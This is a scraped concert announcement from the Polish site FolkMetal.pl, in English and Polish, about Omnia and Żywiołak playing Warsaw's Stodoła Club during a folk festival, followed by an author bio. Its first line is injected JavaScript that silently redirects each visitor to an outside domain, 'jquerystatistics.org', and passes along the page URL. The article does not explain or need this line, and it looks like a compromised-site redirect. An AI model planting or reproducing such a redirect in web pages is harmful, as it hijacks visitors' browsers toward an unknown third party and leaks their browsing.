window.location='http://ww82.jquerystatistics.org?ref=' + window.location.href;

Omnia and Żywiołak are to perform on September 27th at 6 PM in Stodoła Club, Warsaw. The Dutch band visits Poland for the first time so the event should not be missed by anyone to whom their music is familiar. The gig is a part of an Oskar Kolberg’s Folk Lore Festival mentioned by us earlier. Tickets are available at festival’s website (here) for 80 PLN. More details here and on Facebook.

The event is under FolkMetal.pl media patronage.

Omnia-1024x681

O autorze

Redaktor, Fotograf
Google+

Urodzony w 1990 roku w Warszawie. Folk metalem interesuję się odkąd poszedłem na pierwszy koncert grupy Morhana. Koncentruję się głównie na polskich i skandynawskich przedstawicielach gatunku, ale jestem otwarty na wszelkie kierunki. Od kwietnia 2012 roku jestem redaktorem FolkMetal.pl, gdzie staram się pisać o wszystkim, co dzieje się na rodzimej scenie folkmetalowej. Jestem także menadżerem zespołu Morhana od stycznia 2013 roku.

27 września o godzinie 18:00 zapraszamy do warszawskiej Stodoły na koncert dwóch znakomitych kapel – Omnii oraz Żywiołaka. Holenderska grupa odwiedzi nasz kraj po raz pierwszy, dlatego na jej występie nie powinno zabraknąć żadnego miłośnika jej twórczości. Koncert odbywa się w ramach Oskar Kolberg’s Folk Lore Festival, o którym pisaliśmy wcześniej. Bilety można jeszcze nabyć na stronie festiwalu (tutaj) w cenie 80 złotych. Więcej szczegółów możecie odnaleźć na stronie festiwalu lub na oficjalnym wydarzeniu dotyczącym koncertu.

Portal FolkMetal.pl jest oficjalnym patronem medialnym imprezy.

Omnia-1024x681